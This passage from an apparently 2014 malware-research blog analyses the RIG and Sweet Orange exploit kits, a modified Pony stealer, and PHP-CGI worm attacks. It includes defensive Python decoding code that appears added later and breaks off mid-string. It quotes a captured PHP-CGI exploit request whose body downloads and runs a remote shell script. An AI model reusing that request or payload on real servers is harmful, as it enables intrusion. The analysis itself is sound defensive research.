<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0YXrZGONS_M-4FRgJusrtki11Clgk3cExRuGEFBHSgZmjC3LRCz37otLbTqfz1u49rExTX2NDn20J5XJsIZbqYOpYHQJOYYqEhyriNUd68HQ-EwTiWPtFQSrKQ0rb9sTqbRcw-wnNpnM/s1600/rig_landingpage_deob.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0YXrZGONS_M-4FRgJusrtki11Clgk3cExRuGEFBHSgZmjC3LRCz37otLbTqfz1u49rExTX2NDn20J5XJsIZbqYOpYHQJOYYqEhyriNUd68HQ-EwTiWPtFQSrKQ0rb9sTqbRcw-wnNpnM/s1600/rig_landingpage_deob.png" height="220" width="320" /></a></div>
This pattern repeats for every exploit found in the landingpage.</div>
<br />
<h4>
Client identification</h4>
At the very beginning, RIG checks for the presence of Kaspersky and TrendMicro. What's interesting is the code used for checking whether they're installed:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiuef_kAH5x3QqiUwr-lih5aw1RL-mXgdWsfr_9uEQ_eJ19e9uLBDs4tAggzlWzXCyhGJ9AuXMyx7vG8LPkBlotMEOIE7pdmkp7lex5dJ6I0G0t5QPlgojUaKAmb8qJQQD48OnZzcKft0/s1600/rig_landingpage_avcheck.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiuef_kAH5x3QqiUwr-lih5aw1RL-mXgdWsfr_9uEQ_eJ19e9uLBDs4tAggzlWzXCyhGJ9AuXMyx7vG8LPkBlotMEOIE7pdmkp7lex5dJ6I0G0t5QPlgojUaKAmb8qJQQD48OnZzcKft0/s1600/rig_landingpage_avcheck.png" height="209" width="640" /></a></div>
<br />
The code above is the exact same code used in the watering-hole attack <a href="http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html">"Operation Snowman"</a> targeting US military personnel; the only modification is that the code has been made callable from a loop, as it is in the landingpage.<br />
<br />
The code used in Operation Snowman can be seen below; the only difference is that RIG drops the check for EMET and looks for anti-virus instead.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYwvPmN9HfHJMBt2GUqnOsibvjkViQPlm_A2g9BKXVmtGNqdqj_emWixbmqIQFoTIGv_o3qvZgGFgKROhcyWVjFW1fKb6WIIt1YR9OHYLyO0JK5WiTNcxu5QiyV1puXaRPpfNP-5Qq2oU/s1600/rig_landingpage_emet.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYwvPmN9HfHJMBt2GUqnOsibvjkViQPlm_A2g9BKXVmtGNqdqj_emWixbmqIQFoTIGv_o3qvZgGFgKROhcyWVjFW1fKb6WIIt1YR9OHYLyO0JK5WiTNcxu5QiyV1puXaRPpfNP-5Qq2oU/s1600/rig_landingpage_emet.png" height="258" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Code from <a href="http://www.blackploit.com/2014/02/0-day-en-internet-explorer-10-cve-2014.html">Blackploit</a></td></tr>
</tbody></table>
Since this check uses Microsoft.XMLDOM, only users of Internet Explorer will be exploitable. Any other browser will fail the anti-virus check, as the function itself fails. If none of the blacklisted anti-virus products is found to be installed, it performs a function re-assignment of <b>String</b>, which is later used in calling <b>String.fromCharCode</b> to decode each exploit section:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-oQdPKGW6_lW1gqSk9urGjRWiDhCEMJA2n6CBbh4scikdN1QcgLVZGaoDQ7GCsZ0G08kVdAOLnNH-ipTMg-K08ZeMQmVqLuTIGb79lZJso4a2IYeKIwFQ-EZ1HGdlS6Le8JaX5xQh6EU/s1600/rig_landingpage_reassign.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-oQdPKGW6_lW1gqSk9urGjRWiDhCEMJA2n6CBbh4scikdN1QcgLVZGaoDQ7GCsZ0G08kVdAOLnNH-ipTMg-K08ZeMQmVqLuTIGb79lZJso4a2IYeKIwFQ-EZ1HGdlS6Le8JaX5xQh6EU/s1600/rig_landingpage_reassign.png" height="96" width="640" /></a></div>
<br />
<br />
After each exploit section has been decoded, it turns out that no checks are made for which specific plugin version is installed, other than for Adobe Flash:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi82V4n2kA-Y60JngidvAMkTPRaYW-PWbQOwFA_9cp04MAUrsjmfRqO0Bjsyuv1TPE_U7oIJwvYkjDq6vDiGUqnk6B6jnF9gRYr9K5C39nGMD_OYDVEHBH620-QKhGHjTVZCxpZjXe5fy0/s1600/rig_landingpage_flash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi82V4n2kA-Y60JngidvAMkTPRaYW-PWbQOwFA_9cp04MAUrsjmfRqO0Bjsyuv1TPE_U7oIJwvYkjDq6vDiGUqnk6B6jnF9gRYr9K5C39nGMD_OYDVEHBH620-QKhGHjTVZCxpZjXe5fy0/s1600/rig_landingpage_flash.png" height="224" width="640" /></a></div>
<i>(Each section can be decoded by setting a breakpoint on the line calling <b>appendChild</b> in the landingpage and inspecting the content of the parameter; I used the Firefox Debugger in the Web Developer tools.)</i><br />
<br />
<h4>
Detection</h4>
<div>
Much like Fiesta, RIG does change its obfuscated strings; however, the deobfuscation routine stays the same, so it's possible to use almost any line of it for a simple string-matching signature.<br />
<br />
Since RIG doesn't obfuscate the AV detection, it's also possible to trigger on, for example, <b>c:\\windows\\system32</b>, as there is almost no legitimate reason for a webpage to reference files from the system directory.</div>
<h3>Dropnote #2 - Pony changing its pattern</h3>
Published 2014-05-25, updated 2014-06-25 (Anonymous).
After the tweet from @malware_traffic I found myself recognizing the callback pattern and thought I would take a look.<br />
<br />
<blockquote class="twitter-tweet" lang="en">
<a href="https://twitter.com/search?q=%23CryptoWall&src=hash">#CryptoWall</a> infection - 2014-05-25 - Angler EK from 192.99.41.165 - denoting.centrixsf[.]com - PCAP/malware/more at: <a href="http://t.co/LdEKOD3q0n">http://t.co/LdEKOD3q0n</a><br />
— Brad (@malware_traffic) <a href="https://twitter.com/malware_traffic/statuses/470649041403928576">May 25, 2014</a></blockquote>
<br />
The initial callback after the successful exploitation was a POST request to <b>'gate.php'</b> together with a few GET requests for executables, both using HTTP/1.0 as shown below:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU6swJyM3J1I4QwCqUdrYGSjMlW4f8HXm8SXQgFuzZPyIiKj5IfARAEMAe8aDLC2rBlSyXQKJp9jMWNvqSxcVEf6WzLaekaAzuw-s_XnldVA5s7_oxAVNyNnNmQQfAkkfdkoe3F5s9cl8/s1600/post_infectetion_callback.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU6swJyM3J1I4QwCqUdrYGSjMlW4f8HXm8SXQgFuzZPyIiKj5IfARAEMAe8aDLC2rBlSyXQKJp9jMWNvqSxcVEf6WzLaekaAzuw-s_XnldVA5s7_oxAVNyNnNmQQfAkkfdkoe3F5s9cl8/s1600/post_infectetion_callback.png" height="88" width="640" /></a></div>
<br />
The first pattern looks a lot like Pony (Pony is well documented on other blogs); however, I was expecting the usual "Microsoft 98" user-agent when inspecting the whole request, but instead I found:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9CvOFCE-mGsxi1qUTwGLOKsQwOXFhd7N1UN59jObDKNjL95Rp2qrSETNBNshwbltUxbviOQfke_NA745wufsQOl1cLyCxqRn9Ce95rj4FRGotn1QLYHBVApguI67lI_Uc3hYCNVgB-X0/s1600/pony_http_request.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9CvOFCE-mGsxi1qUTwGLOKsQwOXFhd7N1UN59jObDKNjL95Rp2qrSETNBNshwbltUxbviOQfke_NA745wufsQOl1cLyCxqRn9Ce95rj4FRGotn1QLYHBVApguI67lI_Uc3hYCNVgB-X0/s1600/pony_http_request.png" height="259" width="640" /></a></div>
Looking at the <a href="https://www.virustotal.com/en/file/801f4ec08b036d4605a902580ab1454e2659d4f940a42a6474ecb5e10bea9b5b/analysis/">Virustotal results</a>, which at the time of writing are 3/52, it's flagged as "Fareit" by ESET and Kaspersky. So now to the interesting part: what is this Pony up to?<br />
<br />
Pony itself is normally around 86kb depending on configuration, while the payload in this case is 164kb, which suggests that it's either bundled with other malware, a heavily modified version of Pony, or that it includes a lot of junk code.<br />
<br />
After running the sample under a debugger, setting breakpoints on CreateFileA and CreateFileW, I started finding interesting strings, for example the "obfuscated" password used for encryption.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibpvSDdW5rhXizVPTGg9kUuwhaAAXZj9p8y46PL7lU30TFUpJJ0DyhzcCSpJjxV05XxKDeqKdptnRy5U1SzU4vNX-d4-rf49FTkUaEO1nO2mMI_Hh8WGP2bvo7TbGVjzH8rZJRD1X1B9o/s1600/pony_packed_pw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibpvSDdW5rhXizVPTGg9kUuwhaAAXZj9p8y46PL7lU30TFUpJJ0DyhzcCSpJjxV05XxKDeqKdptnRy5U1SzU4vNX-d4-rf49FTkUaEO1nO2mMI_Hh8WGP2bvo7TbGVjzH8rZJRD1X1B9o/s1600/pony_packed_pw.png" height="124" width="640" /></a></div>
<br />
Just to mention: Pony stores the password it uses for encryption in an "obfuscated" pattern where each character is rotated two steps to the right. Looking at an unpacked version of Pony, you'll find that the password is listed just before the callback server.<br />
<br />
The strings above confirm that this is indeed Pony, yet modified. Let's continue with the configuration and encryption.<br />
<br />
By letting Pony run, using the same breakpoints, we find several interesting URLs:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8OEN6MGtoAPyEpuY9VAY3nGn24IsTalvmphkRWoELzwiD-1ssEut3c-alF7by2fwZkieD2pNzjVwuODmAMRa2Vv1vWanO_v6BFowvwDe-fAcFUKt7bH4z-_9GpM4Xf8fIEH04ccoxIGY/s1600/pony_config.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8OEN6MGtoAPyEpuY9VAY3nGn24IsTalvmphkRWoELzwiD-1ssEut3c-alF7by2fwZkieD2pNzjVwuODmAMRa2Vv1vWanO_v6BFowvwDe-fAcFUKt7bH4z-_9GpM4Xf8fIEH04ccoxIGY/s1600/pony_config.png" height="126" width="400" /></a></div>
So now we have the encryption key, two gates and several executables that will be downloaded. Let's try decrypting the posted data.<br />
<br />
Pony 1.9 used two layers of RC4 to protect the data. The key for the first layer is the first four bytes of the POST data; the second layer is encrypted with the key found in the binary.<br />
<br />
Decrypting the first layer gives us the familiar string <b>CRYPTED0:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyWIXN7wgT0_hWg37BcRy7Tp_VWO9_IAbnv5hCq8D6azuOU8jlVHSEvB_BVH_-f5TSVyhTMxEWBOX83ueqrbcqJMsowYdMVk1vfKxjOIUS60rPeoqo_Fd4Tutqbn35amRE_tlsMqR3cbo/s1600/pony_stage1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyWIXN7wgT0_hWg37BcRy7Tp_VWO9_IAbnv5hCq8D6azuOU8jlVHSEvB_BVH_-f5TSVyhTMxEWBOX83ueqrbcqJMsowYdMVk1vfKxjOIUS60rPeoqo_Fd4Tutqbn35amRE_tlsMqR3cbo/s1600/pony_stage1.png" height="292" width="400" /></a></div>
Decrypting the second layer with the key 'guardian1' gives us a compressed report:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLjVXs1Ria81eFqOWZnf7to1MiHxQAJWYbm0FsJRx6GPWQsiLCoUmi8GCnVVSFFKeHXRWCTo_ROEP32A_6LolZP3on35W7_n4NX2se2nl_mcJy6LC1D17HeQXRwnF885voAI-pCnUI8yM/s1600/pony_stage2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLjVXs1Ria81eFqOWZnf7to1MiHxQAJWYbm0FsJRx6GPWQsiLCoUmi8GCnVVSFFKeHXRWCTo_ROEP32A_6LolZP3on35W7_n4NX2se2nl_mcJy6LC1D17HeQXRwnF885voAI-pCnUI8yM/s1600/pony_stage2.png" height="276" width="400" /></a></div>
<br />So the encryption scheme is the same; the changes up to this point are simply there to make it harder to detect, together with the ability to steal Bitcoin wallets.<br />
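The two-layer scheme described above, as an added example (my own code, not the post's or Pony's): a small Python decryptor that peels the first RC4 layer with the four-byte key at the front of the POST body, checks for the CRYPTED0: marker, and then peels the second layer with the password recovered from the binary ('guardian1' in the post). The sample body it works on is constructed inline by the same scheme. Two assumptions are mine: that the four key bytes are sent in clear and the first layer covers everything after them, and the direction in which the two-step rotation of the stored password is undone.<br />
<br />
```python
"""Peel the two RC4 layers off a Pony report body.  Added example, not the
post's or Pony's own code; it follows the scheme the post describes."""

CRYPTED_MARKER = b"CRYPTED0:"  # marker the post shows after layer 1


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA).  Encrypting and decrypting are the same op."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def unrotate_password(obfuscated: str, shift: int = 2) -> str:
    """Undo the "rotated two steps" obfuscation of the stored password.
    ASSUMPTION: "rotated to the right" is read as +shift on every character
    code, so decoding subtracts it; pass shift=-2 if it runs the other way."""
    return "".join(chr(ord(c) - shift) for c in obfuscated)


def decrypt_pony_post(body: bytes, binary_key: bytes) -> bytes:
    """Return the (still compressed) report from a Pony POST body.

    Layer 1 key: the first four bytes of the body.  ASSUMPTION: those four
    bytes are sent in clear and layer 1 covers everything after them.
    Layer 2 key: the password recovered from the binary ('guardian1' in the
    post).  Decompressing the result is out of scope here.
    """
    if len(body) < 4:
        raise ValueError("body too short to carry a 4-byte layer-1 key")
    layer1 = rc4(body[:4], body[4:])
    if not layer1.startswith(CRYPTED_MARKER):
        raise ValueError("no CRYPTED0: marker after layer 1; wrong sample or key scheme")
    return rc4(binary_key, layer1[len(CRYPTED_MARKER):])


def build_sample_post(report: bytes, binary_key: bytes, layer1_key: bytes) -> bytes:
    """Constructed sample: wrap a report by the same two-layer scheme so the
    decryptor can be exercised offline.  Not real Pony traffic."""
    if len(layer1_key) != 4:
        raise ValueError("layer-1 key is four bytes")
    inner = rc4(binary_key, report)
    return layer1_key + rc4(layer1_key, CRYPTED_MARKER + inner)


if __name__ == "__main__":
    key = b"guardian1"
    sample = build_sample_post(b"constructed report bytes", key, b"\x13\x37\xbe\xef")
    print(decrypt_pony_post(sample, key))
    print(unrotate_password("iwctfkcp3"))   # guardian1 under the assumption above
```
<br />
Against a real capture, feed the raw POST body to decrypt_pony_post and the de-rotated password from the binary as binary_key; a ValueError on the marker check is the quickest sign that either the key scheme or the sample is not what the post describes.<br />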
<br />
EDIT: More coverage on the Pony Loader "2.0" on https://blog.damballa.com/archives/2558.<br />
<br />
<pre class="brush">$ date
Mon May 26 01:33:37 CEST 2014
h00p://ourlittleponic.pw/gate.php - Active
h00p://ourponicjunior.pw/gate.php - Domain doesn't resolve
h00p://softwaregamecenter.eu/store/2.exe - Domain doesn't resolve
h00p://softwaregamecenter.eu/store/3.exe - Domain doesn't resolve
h00p://freepicscenter.pw/store/2.exe - <a href="https://www.virustotal.com/en/file/db353becb88a1a728a395f37f3541df79e872d142a7043b026969e91562b1d3e/analysis/1401060980/">27ce89cc842baf51de2e08e2baa50b24</a>
h00p://freepicscenter.pw/store/3.exe - <a href="https://www.virustotal.com/en/file/cf16583886c32dd7f0af39c5019d8d2c5911d3f1004a3dcfec2299c3ce789524/analysis/1401061128/">c1d40e3677ea39be891550f6b03d112d</a>
h00p://freecenterpics.pw/store/2.exe - Domain doesn't resolve
h00p://freecenterpics.pw/store/3.exe - Domain doesn't resolve
h00p://picsfreecenter.pw/store/2.exe - Domain doesn't resolve
h00p://picsfreecenter.pw/store/3.exe - Domain doesn't resolve
</pre>
Also found h00p://freepicscenter.pw/store/1.exe (<a href="https://www.virustotal.com/en/file/bdedd903c00ce40fa480d0d171e509466f2e61fc864574d380af94cff586fbef/analysis/1401061282/">1f195fdf14b2691fcc487f9a474ab443</a>) to be active.<br />
<br />
<h4>
Dropnote #1 - Sweet Orange EK-rental(?)</h4>
Published 2014-02-16, updated 2014-03-02.<br />
<br />
<i>"Dropnotes" are mainly an "online notebook" to share my notes as I go along</i><br />
<br />
While checking my honeypot logs I noticed C2 traffic towards the domain <b>doubleclick-ads.pw</b>; being a .pw domain and all, I started investigating the event.<br />
<br />
The traffic seen consisted of POST requests directed to <b>doubleclick-ads.pw/js/order.php</b>; the sample itself was initially found at <b>fatburrito.pw/GameHacks.exe</b> [<a href="https://www.virustotal.com/en/url/1edc22deac2f507b0a4ec594339b08b764281518ae910ed449a54ce3c807d0a9/analysis/">VT</a>].<br />
<br />
As with all C2-traffic, it would be interesting to identify the panel as well as any other artifacts hosted on the server.<br />
<br />
<pre class="brush: js">Resolving doubleclick-ads.pw (doubleclick-ads.pw)... 162.248.166.113
Connecting to doubleclick-ads.pw (doubleclick-ads.pw)|162.248.166.113|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: ./blah.php [following]
--2014-02-16 12:21:03-- h00p://doubleclick-ads.pw/js/blah.php
Connecting to doubleclick-ads.pw (doubleclick-ads.pw)|162.248.166.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
</pre>
This resulted in a picture being shown, meant as a "joke" aimed at, for example, researchers. The pictures are located in <b>doubleclick-ads.pw/js/img/bp/[0-10].jpg</b>. As I was browsing around checking for indexes I was always presented with a random image. Moving on...<br />
<br />
Requesting the root page is when it got interesting, as it was loading an iframe:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHZDKFkQONzpJtDRHAzdFnJUJFfCRf5koPDNoWA4eInkJQALOF_cReVeZWPMmQm9TMLv60hUvi0BCePdQhFCZosM30TYAWPwEGypl7mnHG1GpJhAIj-eH8NdbDmYY5qFYxOUhe0Tldqp4/s1600/doubleclick-ads.pw_landing.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHZDKFkQONzpJtDRHAzdFnJUJFfCRf5koPDNoWA4eInkJQALOF_cReVeZWPMmQm9TMLv60hUvi0BCePdQhFCZosM30TYAWPwEGypl7mnHG1GpJhAIj-eH8NdbDmYY5qFYxOUhe0Tldqp4/s1600/doubleclick-ads.pw_landing.png" height="128" width="640" /></a></div>
<br />
Which led to yet another iframe:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIO4EyG_52o_6EnQqmWz9vIKfpM7XqLaMclrqpED08Mg0lA12dVRCnaux2MpLDPCbNrRY_gFzH0mkKibiyr3U6N_x80QJGbXqpqhaP9k8HMzjAullws-ATHUftUSoE_3T01eM6DU-qsPI/s1600/xxxpass.info_landing.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIO4EyG_52o_6EnQqmWz9vIKfpM7XqLaMclrqpED08Mg0lA12dVRCnaux2MpLDPCbNrRY_gFzH0mkKibiyr3U6N_x80QJGbXqpqhaP9k8HMzjAullws-ATHUftUSoE_3T01eM6DU-qsPI/s1600/xxxpass.info_landing.png" height="202" width="640" /></a></div>
A few things to note regarding the above shots. All of the pages are reported as malicious, including the last one, which points to the Sweet Orange Exploit Kit (<a href="http://malware.dontneedcoffee.com/2013/12/cve-2013-5329-or-cve-2013-5330-or.html">same pattern as published by @kafeine</a>).<br />
The reason I wanted to highlight the URL is the digit in '/spot<b>8</b>/'; to me this says "There is more here!", so I started changing the number and found that 1-9 are valid folders, all of which generated an iframe pointing to Sweet Orange (number 9 generated two iframes, same domain but different URLs).<br />
<br />
Searching <a href="http://urlquery.net/search.php?q=xxxpass.info&type=string&start=2014-02-01&end=2014-02-16&max=50">urlquery</a> revealed another pattern <b>xxxpass.info/spota/index.php</b> which generated results(!):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNSNJpbIYrd8bElCWpZ2j6Dx6ej5BtWeqabtPA5TU5Z9w2umRwtSMSuyHxZcLjVv12pWLI4iV1FJjPP0G3DGsTa8R2_ellLFcrYe67I-8W0CzogDEHO46KrAPLemJ2TZYSXXNhnpa1kYI/s1600/xxxpass.info_spota.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNSNJpbIYrd8bElCWpZ2j6Dx6ej5BtWeqabtPA5TU5Z9w2umRwtSMSuyHxZcLjVv12pWLI4iV1FJjPP0G3DGsTa8R2_ellLFcrYe67I-8W0CzogDEHO46KrAPLemJ2TZYSXXNhnpa1kYI/s1600/xxxpass.info_spota.png" height="70" width="640" /></a></div>
<br />
Sadly, only '/spot<b>a</b>/' was found to be a valid folder, but as the pattern '/spot<b>X</b>/' repeats, I found that once again 1-9 were valid and allowed directory indexing:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXO6Bwr8avbK_hVWnHos3PcRyKYVacirwSwgnxkhNjOccTQW_X1gX11mkELyrJWLTGmKcRc6IhoPjq1NKbCc91yrknKKFq3KH73hxggZ44ClAO2YYnYz08lMIKg-UgugOoFQ_D5p3NHMs/s1600/botnethosting.com_ekrental_spot8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXO6Bwr8avbK_hVWnHos3PcRyKYVacirwSwgnxkhNjOccTQW_X1gX11mkELyrJWLTGmKcRc6IhoPjq1NKbCc91yrknKKFq3KH73hxggZ44ClAO2YYnYz08lMIKg-UgugOoFQ_D5p3NHMs/s1600/botnethosting.com_ekrental_spot8.png" height="225" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtsJKCSb4Pis_pTYYEsgP_Ixo2JouS90QMvXQEZsLkT8WaYV0Al6lqiWeABywmnkhUyplXXB0ZvmThnM-9YAyMA69oOpcgyzh9GWC4gbXBHQIBYleaLTPeufy77Pam-hZApIPocojF0bU/s1600/botnethosting.com_sweet_orange.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtsJKCSb4Pis_pTYYEsgP_Ixo2JouS90QMvXQEZsLkT8WaYV0Al6lqiWeABywmnkhUyplXXB0ZvmThnM-9YAyMA69oOpcgyzh9GWC4gbXBHQIBYleaLTPeufy77Pam-hZApIPocojF0bU/s1600/botnethosting.com_sweet_orange.png" height="191" width="400" /></a></div>
The files are quite self-explanatory:<br />
<b>getnewlink.php</b> - Generates a new link and saves it to link.txt.<br />
<b>link.txt</b> - Holds the link to where the iframe on xxxpass.info should point.<br />
<b>stats.php</b> - Administration and statistics for the Sweet Orange Exploit Kit.<br />
<br />
<i><b>Misc</b></i><br />
While I was monitoring the generated iframes, I found that a new URI is generated every 60 seconds and a new domain/subdomain every 60 minutes [<a href="http://pastebin.com/VbbwhQxA">Pastebin</a>].<br />
<a href="http://urlquery.net/search.php?q=%28doubleclick-ads\.pw|xxxpass\.info|botnethosting\.com%29&type=regexp&start=2013-12-01&end=2014-02-16&max=50">Hosts involved</a> - urlquery (@urlquery)<br />
<a href="http://www.cybercrime-tracker.net/index.php?search=botnethosting.com">botnethosting.com on cybercrime-tracker.net</a> - Cybercrime-tracker.net (@Xylit0l)<br />
<br />
<h4>
PHP-CGI exploitation never dies?</h4>
Published 2014-02-15, updated 2014-03-02.<br />
<br />
Ever since the vulnerability was discovered in Apache/PHP which allowed PHP code to be executed using a simple HTTP POST request, automated attacks were launched widely, which led to a large number of compromised hosts.<br />
<br />
Those attacks have decreased during the last months; however, one of these automated attacks was particularly interesting because the approach used can be categorized as worm-like. Let's go through the whole attack at a high level before going into the technical part.<br />
<br />
The actor used the exploit released by kingcope [<a href="http://www.exploit-db.com/exploits/29290/">exploit-db</a>] with a modified payload which downloaded a few scripts and binaries, which in turn started scanning a random A-block of IPv4 addresses. If a host was found to be running Apache, exploitation attempts would be launched and the whole process would start over. These attacks were first spotted around November 2013.<br />
<br />
<i><span style="font-size: small;"><b>Inner workings</b></span></i><br />
Now for the fun, more interesting part. One of the exploitation attempts:<br />
<div style="background: black; border: 1px solid grey; color: white; padding: 15px;">
POST /cgi-bin/php.cgi?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1<br />
Content-Length: 82<br />
Host: <i><excluded></i><br />
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25<br />
Connection: close<br />
Content-Type: application/x-www-form-urlencoded<br />
<?php system("wget http://221.132.37.26/sh -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh"); </div>
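Decoded, the query string above is nothing but a list of php-cgi command-line options, which is what makes the request dangerous. The following is an added example (my own code, not the post's honeypot or any tooling from the post) that decodes such a request line the way php-cgi would see it and flags the injected php.ini directives. The request line it uses as input is the one captured above; the other log lines beside it are constructed, and the names analyse_request_line, scan_log and RISKY_DIRECTIVES are mine.<br />
<br />
```python
"""Decode a PHP-CGI argument-injection request line and flag the injected
php.ini directives.  Added example, not the post's honeypot or tooling."""
import re
from urllib.parse import unquote

# Directives the captured request injects with -d, and why each one matters
# to a defender.
RISKY_DIRECTIVES = {
    "allow_url_include": "remote/stream includes enabled",
    "auto_prepend_file": "a file such as php://input runs before every script",
    "safe_mode": "safe mode switched off",
    "disable_functions": "function blacklist cleared",
    "open_basedir": "filesystem restriction removed",
    "cgi.force_redirect": "direct CGI invocation allowed",
    "cgi.redirect_status_env": "redirect-status check bypassed",
    "suhosin.simulation": "Suhosin hardening put in simulation mode",
}

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")

# The request line captured by the post's honeypot, copied verbatim.
CAPTURED_REQUEST_LINE = (
    "POST /cgi-bin/php.cgi?"
    "%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E"
    "+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66"
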